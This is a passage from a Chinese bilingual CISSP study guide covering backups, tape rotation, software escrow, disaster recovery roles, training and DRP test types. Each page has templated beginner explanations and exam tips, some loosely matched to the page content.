许多备份技术都是围绕磁带模式设计的。 虚拟磁带库(VTLs)通过软件将 磁盘存储呈现为磁带,从而支持在此模型中使用磁盘。 一个重要注意事项:寻求采用全磁盘到磁盘方法的组织必须记住保持地理多 样性。 这些磁盘中的一些必须位于异地。 许多组织通过聘请托管服务提供商 来管理远程备份位置来解决这个问题。 云存储 云存储为备份提供了一种灵活且可扩展的解决方案,支持远程、地理分布的 数据存储。 它通过允许从任何位置检索数据,降低了因本地灾难导致数据丢 失的风险。 云备份通常包含冗余机制,且更具成本效益,无需管理物理存储 设备。 当数据跨越司法管辖区存储时,需考虑监管要求,因此合规性成为灾 难恢复规划中云存储策略的重要组成部分。 备份最佳实践 无论采用何种备份解决方案、介质或方法,都必须解决备份中的几个常见问题。 例如,备份和恢复操作可能非常繁重且缓慢。 这种数据传输会显著影响网络性 能,尤其是在常规生产时段。 因此,备份应安排在低峰期(例如夜间)。 备份数据量随时间增加。 这导致每次执行备份时,备份(和恢复)过程所需时 间越来越长。 每次备份还会占用备份介质上更多的空间。

因此,您需要在备份 解决方案中预留足够的容量,以应对合理时间范围内的合理增长。 何为合理, 完全取决于您的环境和预算。 通过定期备份(即每24小时运行一次的备份),始终存在最多长达一个周期的 数据丢失风险。 墨菲定律指出,服务器永远不会在成功备份后立即崩溃,而总 是在下一次备份开始前发生故障。 为避免周期性备份的问题,您可以部署某种 实时连续备份形式,例如RAID、集群或服务器镜像。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1262 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 47 / PDF P1263

第 1263 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Only include necessary information in backups. For example, it might not be important to store operating system files in routine backups. Do you really need hundreds of copies of the operating system? The answer to this question should be influenced by your recovery objectives. If your RTO dictates a rapid recovery capability, the storage cost of maintaining many copies of the operating system may be justified by the fact that it makes restoring the entire system from a stored image quite fast. If you can tolerate a longer recovery time, you might be able to reduce your storage costs by eliminating the backup of redundant files.

Finally, remember to test your organization's recovery processes. Organizations often rely on the fact that their backup software reports a successful backup and fail to attempt recovery until it's too late to detect a problem. This is one of the biggest causes of backup failures. Tape Rotation There are several commonly used tape rotation strategies for backups: the Grandfather-Father-Son (GFS) strategy, the Tower of Hanoi strategy, and the Six Cartridge Weekly Backup strategy. These strategies can be fairly complex, especially with large tape sets.

They can be implemented manually using a pencil and a calendar or automatically by using either commercial backup software or a fully automated hierarchical storage management (HSM) system. An HSM system is an automated robotic backup jukebox consisting of 32 or 64 optical or tape backup devices. All the drive elements within an HSM system are configured as a single drive array (a bit like RAID). Details about various tape rotations are beyond the scope of this book, but if you want to learn more about them, search by their names on the Internet.

Software Escrow Arrangements A software escrow arrangement is a unique tool used to protect a company against the failure of a software developer to provide adequate support for its products or against the possibility that the developer will go out of business and no technical support will be available for the product.

中文直译 / 整理

仅在备份中包含必要的信息。 例如,常规备份中可能无需存储操作系统文件。 您真的需要数百份操作系统副本吗? 这个问题的答案应受您的恢复目标影响。 如果您的RTO要求快速恢复能力,那么维护多个操作系统副本的存储成本可能 因其能显著加快从存储镜像中恢复整个系统而得到合理化。 如果您能接受更长 的恢复时间,则可以通过删除冗余文件的备份来降低存储成本。 最后,请务必测试您组织的恢复流程。 组织通常依赖备份软件报告备份成功,却直到为时已晚、无法发现问题时才 尝试恢复。 这是备份失败的最主要原因之一。 磁带轮换 备份中常用的磁带轮换策略有几种:祖父‑父亲‑儿子(GFS)策略、汉诺塔策 略和六磁带周备份策略。 这些策略可能相当复杂,尤其是在磁带数量庞大的情 况下。 它们可以通过手工方式使用铅笔和日历实现,也可以通过商业备份软件 或全自动分层存储管理(HSM)系统自动实现。 HSM系统是一种自动化的机 器人磁带库,包含32或64个光盘或磁带备份设备。 HSM系统中的所有驱动器 元件均被配置为一个单一的驱动器阵列(类似于RAID)。 关于各种磁带轮换的详细信息超出了本书的范围,但如果您想了解更 多,可以在互联网上通过其名称进行搜索。

软件托管安排 一种软件托管安排是一种独特的工具,用于保护公司免受软件开发人员未能为 其产品提供充分支持的影响,或避免开发人员破产导致产品无法获得技术支持 的风险。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

分层:分层把控制按层排列,让攻击者必须连续突破。

恢复时间目标 RTO:RTO 是业务或系统最多能中断多久。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1263 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

RTO 问时间:多久必须恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
分层 分层把控制按层排列,让攻击者必须连续突破。
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
学习单元 48 / PDF P1264

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

Focus your efforts on negotiating software escrow agreements with those suppliers you fear may go out of business because of their size. It's not likely that you'll be able to negotiate such an agreement with a firm such as Microsoft, unless you are responsible for an extremely large corporate account with serious bargaining power. On the other hand, it's equally unlikely that a firm of Microsoft's magnitude will go out of business, leaving end users high and dry. If your organization depends on custom-developed software or software products produced by a small firm, you may want to consider developing this type of arrangement as part of your disaster recovery plan.

Under a software escrow agreement, the developer provides copies of the application source code to an independent third-party organization. This third party then maintains updated backup copies of the source code in a secure fashion. The agreement between the end user and the developer specifies “trigger events,” such as the failure of the developer to meet terms of a service-level agreement (SLA) or the liquidation of the developer's firm. When a trigger event takes place, the third party releases copies of the application source code to the end user. The end user can then analyze the source code to resolve application issues or implement software updates.

Utilities As discussed in previous sections of this chapter, your organization is reliant on several utilities to provide critical elements of your infrastructure (e.g., electric power, water, natural gas, sewer service). Your disaster recovery plan should contain contact information and procedures to troubleshoot these services if problems arise during a disaster. Logistics and Supplies The logistical problems surrounding a disaster recovery operation are immense. You will suddenly face the problem of moving large numbers of people, equipment, and supplies to alternate recovery sites.

It's also possible that the people will be living at those sites for an extended period of time and that the disaster recovery team will be responsible for providing them with food, water, shelter, and appropriate facilities. Your disaster recovery plan

中文直译 / 整理

将你的努力集中在与那些你担心可能因规模太小而倒闭的供应商谈判软 件托管协议上。 除非你负责一个拥有强大议价能力的极其大型的企业账户, 否则不太可能与微软这样的公司达成此类协议。 另一方面,像微软这样规模 的公司也很不可能倒闭,从而让最终用户陷入困境。 如果您的组织依赖于自研软件或由小型公司开发的软件产品,您可能希望将此 类安排纳入您的灾难恢复计划中。 在软件托管协议下,开发方会将应用程序源 代码的副本提供给一个独立的第三方机构。 该第三方则以安全的方式维护源代 码的更新备份副本。 终端用户与开发方之间的协议规定了“触发事件”,例如 开发方未能履行服务水平协议(SLA)的条款,或开发方公司破产。 当触发事 件发生时,第三方会将应用程序源代码的副本释放给终端用户。 终端用户随后 可以分析源代码以解决应用程序问题或实施软件更新。 实用程序 如本章前几节所述,您的组织依赖于多种公用事业服务来提供基础设施的关键 要素(例如电力、水、天然气、污水处理服务)。 您的灾难恢复计划应包含联 系信息和故障排除程序,以便在灾难发生时应对这些服务的问题。 物流与物资 灾难恢复操作所涉及的后勤问题极为复杂。

您将突然面临将大量人员、设备和 物资转运至备用恢复站点的问题。 此外,人员可能需要在这些站点长期居住, 而灾难恢复团队将负责为他们提供食物、水、住所和适当的设施。 您的灾难恢 复计划

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 49 / PDF P1265

第 1265 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

should contain provisions for this type of operation if it falls within the scope of your expected operational needs. Recovery vs. Restoration It is sometimes useful to separate disaster recovery tasks from disaster restoration tasks. This is especially true when a recovery effort is expected to take a significant amount of time. A disaster recovery team may be assigned to implement and maintain operations at the recovery site, and a salvage team is assigned to restore the primary site to operational capacity. Make these allocations according to the needs of your organization and the types of disasters you face. Recovery and restoration are separate concepts.

In this context, recovery involves bringing business operations and processes back to a working state. Restoration involves bringing a business facility and environment back to a workable state. The recovery team members have a very short time frame in which to operate. They must put the DRP into action and restore IT capabilities as swiftly as possible. If the recovery team fails to restore business processes within the MTD/RTO, then the company fails. Once the original site is deemed safe for people, the salvage team members begin their work. Their job is to restore the company to its full original capabilities and, if necessary, to the original location.

If the original location is no longer in existence, a new primary spot is selected. The salvage team must rebuild or repair the IT infrastructure. Since this activity is basically the same as building a new IT system, the return activity from the alternate/recovery site to the primary/original site is itself a risky activity. Fortunately, the salvage team has more time to work than the recovery team. The salvage team must ensure the reliability of the new IT infrastructure. This is done by returning the least mission-critical processes to the restored original site to stress-test the rebuilt network. As the restored site shows resiliency, more important processes are transferred.

A serious vulnerability exists when mission-critical processes are returned to the original site. The act of returning to the original site could cause a disaster of its own.

中文直译 / 整理

如果此类操作属于您预期的运营需求范围,则应包含相关安排。 恢复与重建 有时将灾难恢复任务与灾难重建任务区分开来是有益的。 当预计恢复工作需要 较长时间时,这一点尤其重要。 可以指派一个灾难恢复团队在恢复站点实施和 维持运营,同时指派一个抢修团队将主站点恢复至可运行状态。 请根据贵组织 的需求以及所面临的灾难类型进行这些分工。 恢复和重建是两个不同的概念。 在此语境中,恢复是指将业务运营和 流程恢复至可运行状态; 重建则是指将业务设施和环境恢复至可运作状态。 恢复团队成员的操作时间非常紧迫。 他们必须立即执行灾难恢复计划( DRP),并尽可能迅速地恢复IT能力。 如果恢复团队未能在MTD/RTO时 限内恢复业务流程,则公司将面临失败。 一旦原址被确认对人员安全,抢修团队便开始工作。 他们的任务是将公司恢复 至完全的原始能力,必要时还需恢复至原址。 如果原址已不复存在,则需选择 一个新的主站点。 抢修团队必须重建或修复IT基础设施。 由于此活动本质上与 构建新的IT系统相同,因此从备用/恢复站点返回主/原站点的过程本身也是一 项高风险活动。 幸运的是,抢修团队拥有比恢复团队更充裕的时间。

救援团队必须确保新的IT基础设施的可靠性。 这是通过将最不关键的业务流 程恢复到重建的原站点以压力测试重建的网络来实现的。 随着恢复站点展现出 韧性,更关键的流程将逐步转移。 当关键业务流程返回原站点时,存在严重漏 洞。 返回原站点的行为本身可能引发一场灾难。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

恢复时间目标 RTO:RTO 是业务或系统最多能中断多久。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1265 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

RTO 是多久恢复,RPO 是能丢多少数据。

RTO 问时间:多久必须恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
学习单元 50 / PDF P1266

第 1266 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Therefore, the state of emergency cannot be declared over until full normal operations have returned to the restored original site. At the conclusion of any disaster recovery effort, the time will come to restore operations at the primary site and terminate any processing sites operating under the disaster recovery agreement. Your DRP should specify the criteria used to determine when it is appropriate to return to the primary site and guide the DRP recovery and salvage teams through an orderly transition. Training, Awareness, and Documentation As with a business continuity plan, it is essential that you provide training to all personnel who will be involved in the disaster recovery effort.

The level of training required will vary according to an individual's role in the effort and their position within the company. When designing a training plan, consider including the following elements: Orientation training for all new employees Initial training for employees taking on a new disaster recovery role for the first time Detailed refresher training for disaster recovery team members Brief awareness refreshers for all other employees (can be accomplished as part of other meetings and through a medium like email newsletters sent to all employees) Loose-leaf binders are an excellent way to store disaster recovery plans.

You can distribute single-page changes to the plan without destroying an entire forest! The disaster recovery plan should also be fully documented. Earlier in this chapter, we discussed several of the documentation options available to you. Be sure you implement the necessary documentation programs and modify the documentation as changes to the plan occur. Because of the rapidly changing nature of the disaster recovery and business continuity plans, you might consider publication on a secured portion of your organization's intranet.

中文直译 / 整理

因此,在所有正常业务完全恢复到重建的原站点之前,不得宣布紧急状态结束。 在任何灾难恢复工作结束后,将需要恢复主站点的运营,并终止根据灾难恢复 协议运行的任何处理站点。 您的灾难恢复计划应明确用于确定何时适合返回主 站点的标准,并指导灾难恢复和救援团队有序过渡。 培训、意识与文档 与业务连续性计划一样,向所有参与灾难恢复工作的人员提供培训至关重要。 所需的培训水平将根据个人在恢复工作中的角色及其在公司内的职位而有所不 同。 在设计培训计划时,请考虑包含以下内容: 面向所有新员工的入职培训 首次承担灾难恢复职责的员工的初始培训 针对灾难恢复团队成员的详细复习培训 为所有其他员工提供简短的意识更新(可通过与其他会议结合或通过发送 给所有员工的电子邮件简报等方式完成) 活页夹是存储灾难恢复计划的绝佳方式。 您可以在不破坏整片 森林的情况下,分发计划的单页更改! 灾难恢复计划也应被完整记录。 本章前面我们讨论了您可以使用的几种记录选 项。 请确保实施必要的文档程序,并在计划发生变化时及时修改文档。 由于灾 难恢复和业务连续性计划变化迅速,您可考虑将文档发布在组织内网的安全区 域。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1266 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 51 / PDF P1267

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

Your DRP should be treated as an extremely sensitive document and provided to individuals on a compartmentalized, need-to-know basis only. Individuals who participate in the plan should understand their roles fully, but they do not need to know or have access to the entire plan. Of course, it is essential to ensure that key DRP team members and senior management have access to the entire plan and understand the high-level implementation details. You certainly don't want this knowledge to rest in the mind of only one individual. Remember that a disaster may render your intranet unavailable.

If you choose to distribute your disaster recovery and business continuity plans through an intranet, be sure you maintain an adequate number of printed copies of the plan at both the primary and alternate sites and maintain only the most current copy! Testing and Maintenance Every disaster recovery plan must be tested on a periodic basis to ensure that the plan's provisions are viable and that it meets an organization's changing needs. The types of tests that you conduct will depend on the types of recovery facilities available to you, the culture of your organization, and the availability of disaster recovery team members.

The six main test types—readthroughs, tabletops, walk-throughs, simulation tests, parallel tests, and fullinterruption tests—are discussed in the remaining sections of this chapter. For more information on this topic, consult NIST SP 800-84 —Guide to Test, Training, and Exercise Programs for IT Plans and Capabilities, available at http://csrc.nist.gov/pubs/sp/800/84/final. Read-Through The read-through is one of the simplest tests to conduct, but it's also one of the most critical. In this test, you distribute copies of disaster recovery plans to the members of the disaster recovery team for review. This lets you accomplish three goals simultaneously:

中文直译 / 整理

您的DRP应被视为极其敏感的文件,仅限于根据职责需要、按最小权限原则提 供给相关人员。 参与计划的人员应充分了解自己的职责,但无需知晓或访问整 个计划。 当然,必须确保关键的DRP团队成员和高级管理层能够访问整个计划 并理解其高层级实施细节。 您绝对不希望这些知识仅存在于某一个人的脑海中。 请记住,灾难可能导致您的内部网络无法使用。 如果您选择通过内 部网络分发灾难恢复和业务连续性计划,请务必在主站点和备用站点均 保留足够数量的计划印刷副本,并仅保留最新版本! 测试与维护 每个灾难恢复计划都必须定期进行测试,以确保计划的条款切实可行,并能满 足组织不断变化的需求。 您所进行的测试类型将取决于您可用的恢复设施类型、 组织的文化以及灾难恢复团队成员的可用性。 本章后续部分将讨论六种主要的 测试类型——阅读审查、桌面推演、走查、模拟测试、并行测试和全面中断测试。 有关此主题的更多信息,请参阅NISTSP800-84——IT计划与能力的测试、 培训和演练计划指南,可从http://csrc.nist.gov/pubs/sp/800/84/final获取。 读取穿透 通过通读是最简单的测试之一,但也是最关键的测试之一。

在此测试中,您将 灾难恢复计划的副本分发给灾难恢复团队成员进行审阅。 这使您能够同时实现 三个目标:

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 52 / PDF P1268

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

It ensures that key personnel are aware of their responsibilities and have that knowledge refreshed periodically. It provides individuals with an opportunity to review the plans for obsolete information and update any items that require modification because of changes within the organization. In large organizations, it helps identify situations in which key personnel have left the company and nobody bothered to reassign their disaster recovery responsibilities. This is also a good reason why disaster recovery responsibilities should be included in job descriptions.

Tabletop During a tabletop, members of the disaster recovery team gather in a large conference room and role-play a disaster scenario. Usually, the exact scenario is known only to the test moderator, who presents the details to the team at the meeting. The team members then refer to their copies of the disaster recovery plan and discuss the appropriate responses to that particular type of disaster. Walk-Through Walk-throughs may vary in their scope and intent. Some exercises include taking physical actions or at least considering their impact on the exercise. For example, a walk-through might require that everyone leave the building and return home to participate in the exercise.

Simulation Test In simulation tests, disaster recovery team members are presented with a scenario and asked to develop an appropriate response. Unlike with the tests previously discussed, some of these response measures are then tested. This may involve the interruption of noncritical business activities and the use of some operational personnel. Parallel Test Parallel tests represent the next level in testing and involve relocating personnel to the alternate recovery site and implementing site activation procedures. The employees relocated to the site perform their disaster recovery responsibilities just as they would for an actual disaster. The only

中文直译 / 整理

它确保关键人员了解其职责,并定期巩固这一知识。 它为个人提供了审查过时信息计划的机会,并根据组织内部的变化更 新任何需要修改的项目。 在大型组织中,它有助于识别关键人员离职后无人重新分配其灾难恢复职 责的情况。 这也是为什么应将灾难恢复职责纳入职位描述的充分理由。 桌面演练 在桌面演练中,灾难恢复团队的成员聚集在大型会议室中,模拟灾难场景。 通 常,确切的场景仅由测试主持人知晓,主持人会在会议中向团队呈现详细情况。 团队成员随后查阅其手中的灾难恢复计划副本,讨论针对该类灾难的适当应对 措施。 步行演练 步行演练的范围和目的可能有所不同。 一些演练包括采取实际行动或至 少考虑其对演练的影响。 例如,一次步行演练可能要求所有人离开大楼并回 家参与演练。 模拟测试 在模拟测试中,灾难恢复团队成员会面临一个场景,并被要求制定相应的应对 措施。 与之前讨论的测试不同,这些应对措施中的一部分会被实际测试。 这可 能涉及中断非关键业务活动以及使用部分运营人员。 并行测试 并行测试代表了测试的下一阶段,涉及将人员转移到备用恢复站点并实施站 点激活程序。 被转移至站点的员工将像应对真实灾难一样履行其灾难恢复职 责。 仅

小白解释

场景先行:你是公司的安全负责人,正在读第 1268 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 53 / PDF P1269

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

difference is that operations at the main facility are not interrupted. That site retains full responsibility for conducting the day-to-day business of the organization. Full-Interruption Test Full-interruption tests operate like parallel tests, but they involve actually shutting down operations at the primary site and shifting them to the recovery site. These tests involve a significant risk, since they require the operational shutdown of the primary site and transfer to the recovery site, followed by the reverse process to restore operations at the primary site. For this reason, full-interruption tests are extremely difficult to arrange, and you often encounter resistance from management.

Lessons Learned At the conclusion of any disaster recovery operation or other security incident, the organization should conduct a lessons learned session. The lessons learned process is designed to provide everyone involved with the incident response effort an opportunity to reflect on their individual roles in the incident and the team's response overall. It is an opportunity to improve the processes and technologies used in incident response to better respond to future security crises. The most common way to conduct lessons learned is to gather everyone in the same room, or connect them via videoconference or telephone, and ask a trained facilitator to lead a lessons learned session.

Ideally, this facilitator should have played no role in the incident response, leaving them with no preconceived notions about the response. The facilitator should be a neutral party who simply helps guide the conversation. Time is of the essence with the lessons learned session because, as time passes, details quickly become fuzzy and memories are lost. The more quickly you conduct a lessons learned session, the more likely it is that you will receive valuable feedback that can help guide future responses. In SP 800-61, NIST offers a series of questions to use in the lessons learned process. They include the following: Exactly what happened and at what times?

How well did staff and management perform in dealing with the incident?

中文直译 / 整理

不同之处在于,主设施的运营不会中断。 该站点仍全面负责组织的日常业务运 行。 完全中断测试 完全中断测试类似于并行测试,但它们涉及实际关闭主站点的运营并将操作转 移至恢复站点。 这些测试存在显著风险,因为它们要求关闭主站点的运营并转 移至恢复站点,随后再执行反向过程以恢复主站点的运营。 因此,完全中断测 试极难安排,您常常会遇到管理层的抵触。 经验教训 在任何灾难恢复操作或其他安全事件结束后,组织应召开一次经验教训会议。 经验教训流程旨在为所有参与事件响应的人员提供机会,反思他们在事件中的 个人角色以及团队的整体响应情况。 这是改进事件响应中所使用流程和技术的 好机会,以便在未来应对安全危机时表现得更好。 开展经验教训的最常见方式是将所有人聚集在同一房间,或通过视频会议或电 话连接,并请一位受过培训的引导者主持经验教训会议。 理想情况下,该引导 者不应参与过事件响应,从而避免对响应过程产生先入为主的观念。 引导者应 作为一个中立方,仅帮助引导讨论。 由于随着时间推移,细节会迅速变得模糊,记忆也会丢失,因此经验总结会议 刻不容缓。 越早开展经验总结会议,就越有可能获得宝贵的反馈,从而帮助指 导未来的应对措施。

在SP 800‑61中,NIST提供了一系列用于经验总结过程的问题。 其中包括以下内 容: 确切发生了什么? 发生在什么时间? 员工和管理层在处理该事件时表现如何?

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

日志:日志记录系统和用户活动,用于监控、审计和调查。

事件响应:事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

